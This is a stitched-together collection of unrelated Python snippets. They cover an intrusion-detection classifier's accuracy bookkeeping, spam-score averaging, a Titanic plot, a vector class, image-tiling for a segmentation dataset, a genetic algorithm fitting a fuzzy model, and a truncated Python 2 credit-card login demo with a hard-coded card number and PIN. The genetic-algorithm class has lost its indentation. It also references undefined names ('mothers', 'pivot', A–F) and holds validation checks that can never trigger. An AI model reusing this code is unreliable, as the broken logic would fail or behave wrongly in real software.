            'R2L':[np.zeros(shape=(NUM_ACC_PASSES, 1)), np.zeros(shape=(NUM_ACC_PASSES, 1))],
            'Probe':[np.zeros(shape=(NUM_ACC_PASSES, 1)), np.zeros(shape=(NUM_ACC_PASSES, 1))],
            'normal':[np.zeros(shape=(NUM_ACC_PASSES, 1)), np.zeros(shape=(NUM_ACC_PASSES, 1))]}
    for i in range(0, NUM_ACC_PASSES):
        clf.train_clf()
        preds, acc[i] = clf.test_clf()
        for cat, pred in zip(cat_labels, preds):
            # bool index: 0 = predicted attack, 1 = predicted 'normal'
            cats[cat][pred == 'normal'][i] += 1
        # reshuffle so each pass trains on a differently-ordered set
        clf.shuffle_training_data()
    conf = calculate_category_accuracy(cats)
    mean = acc.mean()
    std = acc.std()
    write_acc_to_csv([mean, std], cats, conf, clf.__class__.__name__)
    return [mean, std]
def calculate_category_accuracy(cats):
    """Reduce raw per-category counts into accuracy stats and a confusion tally.

    Mutates ``cats`` in place, replacing each category's [attack_counts,
    normal_counts] pair with [mean_accuracy, std_accuracy], and returns a
    dict of per-pass TN/TP/FN/FP count arrays.
    """
    conf = {label: np.zeros(shape=(NUM_ACC_PASSES, 1))
            for label in ('TN', 'TP', 'FN', 'FP')}
    for category in cats:
        hits, misses = cats[category]
        if category == 'normal':
            # for 'normal', slot 1 (predicted normal) is the correct outcome
            hits, misses = misses, hits
            conf['TN'] += hits
            conf['FP'] += misses
        else:
            conf['TP'] += hits
            conf['FN'] += misses
        per_pass = hits / (hits + misses)
        cats[category] = [per_pass.mean(), per_pass.std()]
    return conf
def write_acc_to_csv(acc, cats, conf, name):
    """Append accuracy results for classifier ``name`` to results.csv.

    ``acc`` is [mean, std]; ``cats`` maps category -> [mean, std]; ``conf``
    maps TN/TP/FN/FP -> per-pass count arrays.
    """
    with open('results.csv', 'a', newline='') as csvf:
        writer = csv.writer(csvf)
        writer.writerow([name, 'Number of Passes:', NUM_ACC_PASSES, 'Accuracy'])
        writer.writerow(['Statistic', 'Mean', 'STD'])
        writer.writerow(['Accuracy'] + acc)
        for label, stats in cats.items():
            writer.writerow([label] + stats)
        for label, counts in conf.items():
            writer.writerow([label, counts.mean(), counts.std()])
|
# Use the file name mbox-short.txt as the file name.
# Averages the X-DSPAM-Confidence values found in the mail file.
fname = input("Enter file name: ")
total = 0.0
count = 0  # number of matching lines
# context manager closes the file deterministically (original never closed it)
with open(fname) as fh:
    for line in fh:
        if not line.startswith("X-DSPAM-Confidence:"):
            continue
        # value sits after the 19-char header plus a space, e.g. "0.8475"
        total += float(line[20:27])
        count += 1
if count > 0:
    print('Average spam confidence:', total / count)
else:
    # original raised ZeroDivisionError when no matching lines existed
    print('No X-DSPAM-Confidence lines found.')
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt

# Titanic passenger/survivor counts by sex, from the Udacity sample dataset.
df = pd.read_csv('https://s3.amazonaws.com/content.udacity-data.com/courses/ud359/titanic_data.csv')

# Vectorized boolean masks replace the original row-by-row iterrows() loop
# (same counts, one pass in C instead of a Python loop per passenger).
is_male = df['Sex'] == 'male'
is_female = df['Sex'] == 'female'
survived = df['Survived'] == 1

total_males = int(is_male.sum())
total_females = int(is_female.sum())
survivor_males = int((is_male & survived).sum())
survivor_females = int((is_female & survived).sum())

# totals per sex
plt.bar(['male', 'female'], [total_males, total_females])
plt.show()
# survivors per sex
plt.bar(['male', 'female'], [survivor_males, survivor_females])
plt.show()
|
from __future__ import division
import math
class Vector(object):
    """A 2-D vector with arithmetic, normalization and magnitude ordering.

    Comparisons order vectors by magnitude. The legacy ``__cmp__`` and
    ``__div__`` hooks only exist on Python 2; ``__lt__`` and
    ``__truediv__`` are added so sorting and ``/`` also work on Python 3.
    """

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def magnitude(self):
        """Return the Euclidean length of the vector."""
        return math.sqrt(self.x ** 2 + self.y ** 2)

    def normalize(self):
        """Return a unit vector in the same direction."""
        mag = self.magnitude()  # compute once (original called it twice)
        return Vector(self.x / mag, self.y / mag)

    def direction(self):
        """Return the angle with the x-axis via atan(y/x).

        NOTE(review): atan loses the quadrant and raises on x == 0;
        math.atan2(self.y, self.x) would be more robust, but the existing
        behavior is preserved.
        """
        return math.atan(self.y / self.x)

    def __add__(self, other):
        return Vector(self.x + other.x, self.y + other.y)

    def __sub__(self, other):
        return Vector(self.x - other.x, self.y - other.y)

    def __mul__(self, other):
        """Scalar multiplication."""
        return Vector(self.x * other, self.y * other)

    def __div__(self, other):
        """Scalar division (Python 2 operator hook)."""
        return Vector(self.x / other, self.y / other)

    # Python 3 dispatches / to __truediv__; alias the same implementation.
    __truediv__ = __div__

    def __str__(self):
        return "<" + str(self.x) + "," + str(self.y) + ">"

    def __lt__(self, other):
        # magnitude ordering, matching __cmp__, so sorted() works on Python 3
        return self.magnitude() < other.magnitude()

    def __cmp__(self, other):
        # Python 2 only: cmp() does not exist on Python 3
        return cmp(self.magnitude(), other.magnitude())
def dot(vector1, vector2):
    """Return the scalar (dot) product of two 2-D vectors."""
    return sum((vector1.x * vector2.x, vector1.y * vector2.y))
def angle(vector1, vector2):
    """Return the angle in radians between two vectors."""
    unit1 = vector1.normalize()
    unit2 = vector2.normalize()
    # arccos of the unit vectors' dot product gives the enclosed angle
    return math.acos(dot(unit1, unit2))
|
import cv2
import os
import numpy as np
import random
import shutil
from tqdm import tqdm
def get_filelist(path, ext=()):
    """Return names of entries in *path* whose extension appears in *ext*.

    The "extension" is the text after the last '.', so a name without a
    dot contributes its whole name; directories are not filtered out.
    The default was changed from a mutable [] to an immutable () —
    identical behavior, avoids the shared-mutable-default pitfall.
    """
    return [name for name in os.listdir(path) if name.split('.')[-1] in ext]
def load_img(path, grayscale=False):
    """Read an image from disk and scale it to float values in [0, 1].

    Reads a single grayscale channel when ``grayscale`` is True, otherwise
    OpenCV's default BGR color layout.
    """
    raw = cv2.imread(path, cv2.IMREAD_GRAYSCALE) if grayscale else cv2.imread(path)
    return np.array(raw, dtype="float") / 255.0
def load_label(path):
    """Read a label mask from disk as a single-channel grayscale image."""
    return cv2.imread(path, cv2.IMREAD_GRAYSCALE)
def get_random_data(annotation, random=True, grayscale = False):
    '''Load an image/mask pair and optionally apply random augmentation.

    ``annotation`` is the file name under the src/ and label/ subfolders of
    the module-level ``train_path`` (NOTE(review): ``train_path`` is not
    defined in this file — it must be supplied by the importing module).
    When ``random`` is True, a random rotation (0/90/180/270) and a random
    flip are applied identically to image and mask. NOTE: the ``random``
    parameter shadows the imported ``random`` module inside this function.

    Returns (image_array, mask).
    '''
    images = load_img(train_path + 'src/' + annotation, grayscale = grayscale)
    mask = load_label(train_path + 'label/' + annotation)
    if not random:
        # no augmentation requested: return the pair as loaded
        return np.array(images), mask
    img_h, img_w, _ = images.shape
    def rotate(xb, yb, angle):
        # rotate image and mask around the image center by `angle` degrees
        M_rotate = cv2.getRotationMatrix2D((img_w / 2, img_h / 2), angle, 1)
        xb = cv2.warpAffine(xb, M_rotate, (img_w, img_h))
        yb = cv2.warpAffine(yb, M_rotate, (img_w, img_h))
        return xb, yb
    def random_augment(xb, yb):
        # warpAffine needs an integer image; note this discards the earlier
        # [0, 1] float scaling from load_img
        xb = xb.astype(np.uint8)
        r = np.random.random()
        if r < 0.25:
            xb, yb = rotate(xb, yb, 90)
        elif (r >= 0.25) and (r < 0.5):
            xb, yb = rotate(xb, yb, 180)
        elif (r >= 0.5) and (r < 0.75):
            xb, yb = rotate(xb, yb, 270)
        # else: leave unrotated
        r = np.random.random()
        if r < 0.25:
            # flip horizontally
            xb = cv2.flip(xb, 1)
            yb = cv2.flip(yb, 1)
        elif (r >= 0.25) and (r < 0.5):
            # flip vertically
            xb = cv2.flip(xb, 0)
            yb = cv2.flip(yb, 0)
        elif (r >= 0.5) and (r < 0.75):
            # flip both horizontally and vertically
            xb = cv2.flip(xb, -1)
            yb = cv2.flip(yb, -1)
        return xb, yb
    images, mask = random_augment(images, mask)
    return np.array(images), mask
def split_img_and_mask(image, label, split_size, split_dir):
    """Tile ``image`` and ``label`` into square patches and save them as PNGs.

    Patches of ``split_size`` x ``split_size`` are written under
    split_dir/image and split_dir/label (created if missing), named
    'img_<w>_<h>.png' by their top-left corner. A patch is skipped when 40%
    or more of its pixels are fully black (all channels zero).
    """
    split_img_path = os.path.join(split_dir, 'image')
    if not os.path.exists(split_img_path):
        os.makedirs(split_img_path)
        print('makedir: ', split_img_path)
    split_label_path = os.path.join(split_dir, 'label')
    if not os.path.exists(split_label_path):
        os.makedirs(split_label_path)
        print('makedir: ', split_label_path)
    count = 0
    src_h, src_w, src_c = image.shape
    for i in range(int(src_w / split_size)):
        w = i * split_size
        for j in range(int(src_h / split_size)):
            h = j * split_size
            src_out = image[h:h + split_size, w:w + split_size]
            label_out = label[h:h + split_size, w:w + split_size]
            # fraction of fully-black pixels in this tile
            blank = np.all(src_out == 0, axis=-1)
            # np.int was removed in NumPy 1.24; plain int is the equivalent
            if np.sum(blank.astype(int)) < (split_size * split_size * 0.4):
                tile_name = 'img_' + str(w) + '_' + str(h) + '.png'
                cv2.imwrite(os.path.join(split_img_path, tile_name), src_out)
                cv2.imwrite(os.path.join(split_label_path, tile_name), label_out)
                print('{:4d} write: {}'.format(count + 1, tile_name))
                count += 1
    print('done!')
def apportion(src_dir, apport_dir, apport_rate, seed):
    """Randomly split the tiled dataset into train/valid folders.

    ``apport_rate`` is e.g. {'train': 0.7, 'valid': 0.3}; ``seed`` makes the
    shuffle reproducible. Also reports, per split, the fraction of tiles
    containing class 1 ('corn') and class 2 ('baccy') mask pixels.
    """
    # create the output directory tree
    train_src_path = os.path.join(apport_dir, 'train','image')
    train_label_path = os.path.join(apport_dir, 'train','label')
    valid_src_path = os.path.join(apport_dir, 'valid','image')
    valid_label_path = os.path.join(apport_dir, 'valid','label')
    if not os.path.exists(train_src_path):
        os.makedirs(train_src_path)
    if not os.path.exists(train_label_path):
        os.makedirs(train_label_path)
    if not os.path.exists(valid_src_path):
        os.makedirs(valid_src_path)
    if not os.path.exists(valid_label_path):
        os.makedirs(valid_label_path)
    src_path = os.path.join(src_dir, 'image')
    label_path = os.path.join(src_dir, 'label')
    all_imgs = get_filelist(src_path,['png'])
    # per-split counters for tiles containing each crop class
    train_corn = 0
    train_baccy = 0
    valid_corn = 0
    valid_baccy = 0
    train_list = []
    valid_list = []
    total_num = len(all_imgs)
    train_num = total_num*apport_rate['train']
    valid_num = total_num*apport_rate['valid']
    print('train:%d | valid:%d '%(train_num,valid_num))
    # deterministic shuffle, then the first train_num entries become train
    random.seed(seed)
    random.shuffle(all_imgs)
    for i in range(total_num):
        if i <train_num:
            train_list.append(all_imgs[i])
        elif (i >= train_num) and (i < total_num):
            valid_list.append(all_imgs[i])
    for f in train_list:
        # -1 = cv2.IMREAD_UNCHANGED: keep the raw label values
        mask = cv2.imread(label_path+'/'+f, -1)
        if np.any(mask==1):
            train_corn += 1
        if np.any(mask==2):
            train_baccy += 1
        shutil.copy(src_path+'/'+f, train_src_path)
        shutil.copy(label_path+'/'+f, train_label_path)
    for f in valid_list:
        mask = cv2.imread(label_path+'/'+f, -1)
        if np.any(mask==1):
            valid_corn += 1
        if np.any(mask==2):
            valid_baccy += 1
        shutil.copy(src_path+'/'+f, valid_src_path)
        shutil.copy(label_path+'/'+f, valid_label_path)
    if (train_num > 0):
        print('train_corn: {:.2f}%, train_baccy: {:.2f}%'.format(train_corn / train_num*100, train_baccy / train_num*100))
    if (valid_num > 0):
        print('valid_corn: {:.2f}%, valid_baccy: {:.2f}%'.format(valid_corn / valid_num*100, valid_baccy / valid_num*100))
    print('done!')
if __name__ == '__main__':
    src_dir = './dataset/split_512/'
    apport_dir = './dataset/split_512/apport/'
    # train/valid split ratio
    apport_rate = {'train': 0.70, 'valid': 0.30}
    # BUG FIX: apportion() requires a `seed` argument; the original call
    # omitted it and raised TypeError at startup. A fixed seed also keeps
    # the train/valid split reproducible across runs.
    apportion(src_dir, apport_dir, apport_rate, seed=2021)
'''
Owner: Luis Eduardo Hernandez Ayala
Email: luis.hdez97@hotmail.com
Python Version: 3.7.x, but shouldn't have problems with 2.7.x
'''
from math import sqrt, cos, sin
from FussyNetwork import GaussyModel
import numpy as np
import random
# Matplotlib is optional: plotting helpers check `plt_found` before use.
# BUG FIX: narrowed the bare `except:` (which also swallowed SystemExit /
# KeyboardInterrupt) to ImportError, the only failure this guard is for.
try:
    import matplotlib.pyplot as plt
    import matplotlib.path as mpath
    import matplotlib.patches as mpatches
    from mpl_toolkits.mplot3d import Axes3D  # noqa: F401 unused import
    plt_found = True
except ImportError:
    plt_found = False
# Module-wide log sink shared by PSmodel and GaussyModel; opened for the
# process lifetime and never explicitly closed (flushed at interpreter exit).
logger = open('logs.log', 'w')

# Indices into the `resolutions` list handed to PSmodel: one divisor per
# cromosome segment.
RESOLUTION_MEDIAN = 0
RESOLUTION_DESV_STD = 1
RESOLUTION_P = 2
RESOLUTION_Q = 3
RESOLUTION_R = 4

# Slice boundaries of the 39-gen cromosome layout:
#   [0:6)   medians (3 for X, 3 for Y)
#   [6:12)  standard deviations (3 for X, 3 for Y)
#   [12:21) rule parameter p, [21:30) q, [30:39) r (9 rules each)
MEDIAN_START = 0
MEDIAN_END = 6
DESV_STD_START = 6
DESV_STD_END = 12
PARAM_P_START = 12
PARAM_P_END = 21
PARAM_Q_START = 21
PARAM_Q_END = 30
PARAM_R_START = 30
PARAM_R_END = 39
class FussyParameters():
    """Unpack a 39-gen cromosome into the fuzzy-model parameter layout.

    Gene layout (see the module-level *_START/_END constants):
      - genes 0-5:   medians (3 X membership functions, then 3 Y)
      - genes 6-11:  standard deviations (3 X, then 3 Y)
      - genes 12-38: rule parameters p (12-20), q (21-29), r (30-38)
    """

    def __init__(self, cromosome):
        # Each membership entry is [median, desv_std, gaussy_values]; the
        # last slot is filled in later by GaussyModel, so the rules below
        # deliberately alias the very same list objects.
        # BUG FIX: X[1] originally reused cromosome[0]/cromosome[6] (an
        # evident copy-paste of X[0]); genes 1 and 7 were never read
        # anywhere else, so X[1] now takes them as the layout implies.
        X = [[cromosome[i], cromosome[6 + i], None] for i in range(3)]
        Y = [[cromosome[3 + i], cromosome[9 + i], None] for i in range(3)]
        # Rule i combines p = gene 12+i, q = gene 21+i, r = gene 30+i with
        # memberships enumerated row-major: X advances every 3 rules, Y
        # cycles within each group of 3.
        fussy_rules = [
            [cromosome[12 + i], cromosome[21 + i], cromosome[30 + i],
             X[i // 3], Y[i % 3]]
            for i in range(9)
        ]
        self.X = X
        self.Y = Y
        self.fussy_rules = fussy_rules
class PSmodel():
def __init__(self, population_size, cromosome_size, target_values, resolutions, generations, bottom_limit, top_limit, step, competidors_percentage=0.05, mutation_percentage=0, gen_bit_length=8, elitism=False, graph_generations=False, debuglevel=0):
# Validate population size to be an even number
if population_size % 2 == 1:
raise Exception("Population size must be an even number")
self.population_size = population_size
# Validate the competidors percentage to be between 1 and 100
if competidors_percentage < 0.1 and competidors_percentage > 0.99:
raise Exception("Competidor percentage must be a number between 0.1 and 0.99")
self.competidors_percentage = competidors_percentage
if mutation_percentage < 0 and mutation_percentage > 1:
raise Exception("Mutations percentage must be a number between 0 and 1")
self.total_mutations = int(population_size * mutation_percentage)
self.cromosome_size = cromosome_size
self.generations = generations
self.gen_bit_length = gen_bit_length
self.resolutions = resolutions
self.elitism = elitism
self.x_bottom_limit = bottom_limit
self.x_top_limit = top_limit
self.x_step = step
self.graph_generations = graph_generations
self.debuglevel = debuglevel
self.population = None
self.fittiests_history = None
self.fittiest = None
print(f"Target = {target_values}")
self.target = target_values
@staticmethod
def get_y(x, cromosome):
    # NOTE(review): dead code left over from a different curve-fitting
    # exercise -- A..F are undefined module-wide, so calling this raises
    # NameError. Nothing visible in this file calls it; kept verbatim.
    # return cromosome[A] * (cromosome[B] * sin(x/cromosome[C]) + cromosome[D] * sin(x/cromosome[E])) + cromosome[F] * x - cromosome[D]
    return cromosome[A] * (cromosome[B] * sin(x/cromosome[C]) + cromosome[D] * sin(x/cromosome[E])) + cromosome[F] * x - cromosome[D]
@staticmethod
def gen_to_binary(gen, gen_bit_length):
format_schema = "{0:" + "{0:02d}".format(gen_bit_length) + "b}"
return format_schema.format(gen)
@staticmethod
def bin_to_dec(binary_value):
return int(binary_value, 2)
@staticmethod
def flip_bit(bit):
if bit == "1":
return "0"
return "1"
@staticmethod
def is_valid_cromosome(cromosome):
    """A cromosome is valid when no standard-deviation gene is zero
    (presumably the Gaussian model divides by desv_std -- TODO confirm
    against FussyNetwork.GaussyModel)."""
    return all(gene != 0 for gene in cromosome[DESV_STD_START:DESV_STD_END])
@staticmethod
def resolutionate(values, resolution):
result = [0] * len(values)
for i in range(len(values)):
result[i] = values[i] / resolution
return result
def get_resolutionated_cromosome(self, cromosome):
    """Return the cromosome with every segment divided by that segment's
    configured resolution (medians, desv_stds, then rule params p/q/r)."""
    segments = (
        (MEDIAN_START, MEDIAN_END, RESOLUTION_MEDIAN),
        (DESV_STD_START, DESV_STD_END, RESOLUTION_DESV_STD),
        (PARAM_P_START, PARAM_P_END, RESOLUTION_P),
        (PARAM_Q_START, PARAM_Q_END, RESOLUTION_Q),
        (PARAM_R_START, PARAM_R_END, RESOLUTION_R),
    )
    scaled = []
    for start, end, resolution_index in segments:
        scaled += self.resolutionate(cromosome[start:end], self.resolutions[resolution_index])
    return scaled
def get_function_values(self, cromosome):
    """Decode *cromosome* into fuzzy parameters and evaluate the model.

    Returns whatever GaussyModel.fit() produces; evaluate() indexes the
    result as [row][col], so presumably a 2-D grid of outputs -- TODO
    confirm against FussyNetwork.GaussyModel.
    """
    # Raw integer genes are first scaled down by the configured resolutions.
    resolutionated_cromosome = self.get_resolutionated_cromosome(cromosome)
    parameters = FussyParameters(resolutionated_cromosome)
    # The model is evaluated over [x_bottom_limit, x_top_limit] in x_step
    # increments, sharing the module-level log file handle.
    fussy_model = GaussyModel(
        x_elements = parameters.X,
        y_elements = parameters.Y,
        rules = parameters.fussy_rules,
        step = self.x_step,
        step_range = [self.x_bottom_limit,self.x_top_limit],
        logger = logger,
        debuglevel = self.debuglevel)
    return fussy_model.fit()
def evaluate(self, cromosome):
error = 0
cromosome_values = self.get_function_values(cromosome)
for j in range(len(self.target)):
for i in range(len(self.target[j])):
error += abs(cromosome_values[j][i] - self.target[j][i])
return error
def log(self, text, debuglevel=0, logtype="INFO"):
    """Print *text* and append it to the module-level log file.

    The message is emitted only when the instance's debuglevel is <= the
    message's debuglevel, i.e. raising the instance level suppresses
    lower-level messages.
    """
    if self.debuglevel <= debuglevel:
        msg = "{} - {}".format(logtype, text)
        print(msg)
        logger.write(msg + '\n')
def generate_population(self):
'''
Generate a population where each individual consists of an array of 3 numbers which can go from 0 to 2^gen_bit_length-1 (gen_bit_length is received as a parameter, default=8)
'''
max_value = 2 ** self.gen_bit_length
temp_population = [0] * self.population_size
for i in range(self.population_size):
temp_population[i] = [0] * (self.cromosome_size + 1)
valid_cromosome = False
while not valid_cromosome:
for j in range(self.cromosome_size):
temp_population[i][j] = random.randrange(0, max_value)
valid_cromosome = PSmodel.is_valid_cromosome(temp_population[i])
return temp_population
def get_fittiest(self):
fittiest = None
for cromosome in self.population:
if fittiest == None or cromosome[-1] < fittiest[-1]:
fittiest = cromosome
return fittiest
def calculate_aptitud_function(self):
'''
Calculate the aptitud function for each cromosome and store the result in the last position of the list
'''
for cromosome in self.population:
cromosome[-1] = self.evaluate(cromosome)
def tournament_compete(self, total_competidors):
'''
Get an 'n' number of 'randomly' selected cromosomes and get the one with the lowest value of the aptitud function
'n' is given by the parameter 'total_competidors'
'''
self.log("-----start of tournament with {:d} competidors-----".format(total_competidors))
winner = None
for i in range(total_competidors):
rndindex = random.randrange(self.population_size)
self.log("{}".format(str(self.population[rndindex])))
# If there's still no winner (first item in the loop) just assign it to be the temporal winner
if winner == None or self.population[rndindex][-1] < winner[-1]:
winner = self.population[rndindex]
continue
self.log("Winner = {}".format(str(winner)))
self.log("-----end of tournament-----")
return winner
def tournament(self):
'''
Make a tournament to get a new list of 'n' cromosomes. 'n' is the total population size / 2.
The self.logic to get the cromosomes for this new list is delegated to the method 'tournament_compete'
'''
total_competidors = int(self.population_size * self.competidors_percentage)
total_winners = int(self.population_size / 2)
winners = [0] * total_winners
for i in range(total_winners):
winners[i] = self.tournament_compete(total_competidors)
self.log('------winners tournament----')
self.print_population(winners)
return winners
def breeding_operator1(self, father, mother):
'''
This breeding method will get a pivot randomely and will use it to 'break' each cromosome (father's and mother's cromosomes)
Child1 will consist on father's binary value from position 0 to pivot, and mother's binary value from pivot to last position
Child2, on the other hand, will consist on mothers's binary value from position 0 to pivot, and fathers's binary value from pivot to last position
'''
def cromosome_to_binary(cromosome, gen_bit_length):
result = ""
for i in range(len(cromosome)-1):
result += PSmodel.gen_to_binary(cromosome[i], gen_bit_length)
return result
def binary_to_cromosome(binary, gen_bit_length):
result = []
for i in range(0, len(binary), gen_bit_length):
result.append(PSmodel.bin_to_dec(binary[i:i+gen_bit_length]))
return result
# Get random pivot which will divide the cromosome
pivot = random.randrange(1, self.gen_bit_length * self.cromosome_size)
# Convert each cromsome to it's binary equivalent. This get the binary value of each gen and will merge them into one
father_binary = cromosome_to_binary(father, self.gen_bit_length)
mother_binary = cromosome_to_binary(mother, self.gen_bit_length)
# Do the breeding
child1_binary = father_binary[:pivot] + mother_binary[pivot:]
child2_binary = mother_binary[:pivot] + father_binary[pivot:]
# Split the final binary value into each gen
child1 = binary_to_cromosome(child1_binary, self.gen_bit_length) + [0]
child2 = binary_to_cromosome(child2_binary, self.gen_bit_length) + [0]
self.log("{} & {} ({:d})= {} & {}".format(str(father), str(mother), pivot, str(child1), str(child2)), 2)
return child1, child2
def breeding_operator2(self, father, mother):
def cromosome_to_binary(cromosome, gen_bit_length):
result = ""
for i in range(len(cromosome)-1):
result += PSmodel.gen_to_binary(cromosome[i], gen_bit_length)
return result
def binary_to_cromosome(binary, gen_bit_length):
result = []
for i in range(0, len(binary), gen_bit_length):
result.append(PSmodel.bin_to_dec(binary[i:i+gen_bit_length]))
return result
# Get random pivot which will divide the cromosome
pivot1 = random.randrange(1, self.gen_bit_length * self.cromosome_size)
pivot2 = random.randrange(1, self.gen_bit_length * self.cromosome_size)
if pivot1 > pivot2:
tmp = pivot1
pivot1 = pivot2
pivot2 = tmp
# Convert each cromsome to it's binary equivalent. This get the binary value of each gen and will merge them into one
father_binary = cromosome_to_binary(father, self.gen_bit_length)
mother_binary = cromosome_to_binary(mother, self.gen_bit_length)
# Do the breeding
child1_binary = father_binary[:pivot1] + mother_binary[pivot1:pivot2] + father_binary[pivot2:]
child2_binary = mother_binary[:pivot1] + father_binary[pivot1:pivot2] + mother_binary[pivot2:]
# Split the final binary value into each gen
child1 = binary_to_cromosome(child1_binary, self.gen_bit_length) + [0]
child2 = binary_to_cromosome(child2_binary, self.gen_bit_length) + [0]
self.log("{} & {} ({:d})= {} & {}".format(str(father), str(mother), pivot, str(child1), str(child2)), 2)
return child1, child2
def breether_factory(self, father, mother):
i = random.randrange(0, 100)
# i = 20
if i > 20:
return self.breeding_operator1(father, mother)
else:
return self.breeding_operator1(father, mothers)
def breed(self, fathers, mothers):
'''
select the breeding method
'''
self.log('------breeding-------')
newpopulation = [0] * self.population_size
for i in range(int(self.population_size/2)):
valid_children = False
while not valid_children:
child1, child2 = self.breeding_operator1(fathers[i], mothers[i])
valid_children = PSmodel.is_valid_cromosome(child1) and PSmodel.is_valid_cromosome(child2)
newpopulation[i*2], newpopulation[i*2+1] = child1, child2
self.log('------end of breeding-------')
return newpopulation
def apply_elitism(self, fathers, mothers, children):
self.log("**** Applying elitism ****", debuglevel=0)
tmp = fathers + mothers + children
self.print_population(tmp, debuglevel=0)
self.log("Sorted population", debuglevel=0)
tmp = sorted(tmp, key=lambda x:x[-1])
self.print_population(tmp, debuglevel=0)
result = tmp[:self.population_size]
self.log("**** Elitism result ****")
self.print_population(result, debuglevel=0)
self.log("**** End of Elitism ****")
return result
def mutate_gen(self, gen, bit_index):
binary = list(PSmodel.gen_to_binary(gen, self.gen_bit_length))
binary[bit_index] = PSmodel.flip_bit(binary[bit_index])
binary = "".join(binary)
return PSmodel.bin_to_dec(binary)
def mutate_cromosome(self, cromosome, gen_index, bit_index=None):
# Get which bit to mutate
if bit_index == None:
bit_index = random.randrange(0, self.gen_bit_length)
# Apply mutation to gen
cromosome[gen_index] = self.mutate_gen(cromosome[gen_index], bit_index)
return cromosome
def mutation(self):
for i in range(self.total_mutations):
# Get which cromosome to mutate
rnd_index = random.randrange(0, self.population_size)
selected_cromosome = self.population[rnd_index]
log_builder = f"Cromosome mutated from {selected_cromosome} to -> "
# Get which gen to mutate from the cromosome
rnd_gen_index = random.randrange(0, self.cromosome_size)
# Apply mutation
mutated_cromosome = self.mutate_cromosome(selected_cromosome, rnd_gen_index)
while(not PSmodel.is_valid_cromosome(mutated_cromosome)):
mutated_cromosome = self.mutate_cromosome(selected_cromosome, rnd_gen_index)
self.population[rnd_index] = mutated_cromosome
self.log(log_builder + str(selected_cromosome), 1)
def graph_history(self):
    """Plot the fittiest cromosome's error across all generations, or print
    an install hint when matplotlib is unavailable."""
    if not plt_found:
        # FIX: corrected the typo 'libary' in the user-facing message.
        print("Matplotlib library not found. Install it to see the graph. Install: 'pip install matplotlib'")
        return
    plt.rcParams.update({'font.size': 6})
    plt.plot([i + 1 for i in range(self.generations)], self.fittiests_history)
    plt.ylabel('Error')
    plt.xlabel('Generations')
    plt.show()
def plot_data(self, generation):
    """Render a 3-panel figure: target surface, current fittiest's surface,
    and the error history up to *generation*. Requires matplotlib; callers
    gate this behind the graph_generations flag (fit() also calls it once
    at the end)."""
    fig = plt.figure(figsize=plt.figaspect(0.3))
    fig.suptitle(f"Generation #{generation}")
    # Shared surface grid over the model's evaluation range; assumes the
    # target/model grids match this shape -- TODO confirm vs GaussyModel.
    X = np.arange(self.x_bottom_limit, self.x_top_limit, self.x_step)
    Y = np.arange(self.x_bottom_limit, self.x_top_limit, self.x_step)
    X, Y = np.meshgrid(X, Y)
    # Target
    ax = fig.add_subplot(1, 3, 1, projection='3d')
    ax.set_title('Target')
    ax.set_xlabel('Sugar')
    ax.set_ylabel('Lemon')
    Z = np.array(self.target)
    surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, linewidth=0, antialiased=False)
    # Generation fittiest
    ax = fig.add_subplot(1, 3, 2, projection='3d')
    ax.set_title('Current')
    ax.set_xlabel('Sugar')
    ax.set_ylabel('Lemon')
    Z = np.array(self.get_function_values(self.fittiest))
    surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, linewidth=0, antialiased=False)
    # History
    ax = fig.add_subplot(1, 3, 3)
    ax.set_title('Error history')
    ax.set_xlabel('Generation')
    ax.set_ylabel('Error')
    ax.plot([i+1 for i in range(generation)], self.fittiests_history)
    # fig.tight_layout()
    plt.show()
def fit(self):
    '''
    Main method of the algorithm. This method will coordinate each step to make the ordinary genetic algorithm work
    '''
    # Scratch list kept for compatibility; the per-cromosome error actually
    # lives in each cromosome's trailing slot.
    self.aptituds = [0] * self.population_size
    self.fittiests_history = []
    # Get initial population randomly and store it in the global variable
    self.population = self.generate_population()
    # Calculate the aptitud function for each cromosome
    self.calculate_aptitud_function()
    for i in range(self.generations):
        # Get a new list of cromosomes with a tournament
        fathers = self.tournament()
        mothers = self.tournament()
        self.log('----fathers----', 1)
        self.print_population(fathers, 1)
        self.log('----mothers----', 1)
        self.print_population(mothers, 1)
        # from the winners of the tournament, get new cromosomes by a 'breeding' process and overwrite the actual population with the new population originated from the 'winners'
        self.population = self.breed(fathers, mothers)
        # Apply mutations
        self.mutation()
        # Calculate the aptitud function for each new cromosome
        self.calculate_aptitud_function()
        # Apply elitism if required
        if self.elitism:
            self.population = self.apply_elitism(fathers, mothers, self.population)
        # Get fittiest to make the graph
        self.fittiest = self.get_fittiest()
        self.fittiests_history.append(self.fittiest[-1])
        # self.graph_history()
        self.log(f"---------Generation {i+1}", 2)
        self.print_population(debuglevel=2)
        if self.graph_generations:
            self.plot_data(generation=i+1)
        self.log(self.fittiest, 5, f"Generation {i+1}")
        self.log(self.fittiest[-1], 5, "Error")
    # NOTE(review): original indentation was lost; the history log and the
    # final summary plot are taken to run once after the generation loop.
    self.log(self.fittiests_history, 2)
    # self.plot_functions(generation_fittiest, i)
    self.plot_data(generation=i+1)
    return self.fittiest
def print_population(self, population=None, debuglevel=0):
'''
Used for debug
'''
if population == None:
population = self.population
for i in range(len(population)):
self.log(str(population[i]), debuglevel) |
#!/bin/env python
#_*_coding:utf-8_*_
#Author:swht
#E-mail:qingbo.song@gmail.com
#Date:2015.11.24
#Version:V0.0.1
import centerclass
import bankmanage
import main
import time

# Hard-coded demo credit-card account: card number ('ID'), PIN ('Pass')
# and balance ('Yue').
bankdict = {'ID':1018584989,'Pass':123456,'Yue':15000}
def bank_login():
    # Credit-card login prompt (Python 2 module: print statement,
    # raw_input). Allows up to 4 attempts (flag 0..3) before returning to
    # the main menu.
    centerclass.bank.Print()
    flag = 0
    while flag <= 3:
        creditId = raw_input("请输入你的信用卡号 :").strip()
        creditPass = raw_input(u"请输入你的信用卡密码:").strip()
        # Only purely numeric card numbers are accepted.
        if creditId.isdigit():
            ifBankId(creditId,creditPass,flag)
        else:
            print "你输入的信用卡号类型不正确,请重新输入!"
        # NOTE(review): source indentation was lost; the counter is assumed
        # to advance once per loop iteration. Also, ifBankId only rebinds
        # its local `flag` copy, so failed PIN attempts inside it never
        # increase this counter.
        flag += 1
    print "你输入的错误次数已达3次,程序将退出!"
    main.welcome()
def ifBankId(creditId,creditPass,flag):
    # Validate the card number and PIN against the hard-coded bankdict
    # entry and enter the service menu on success.
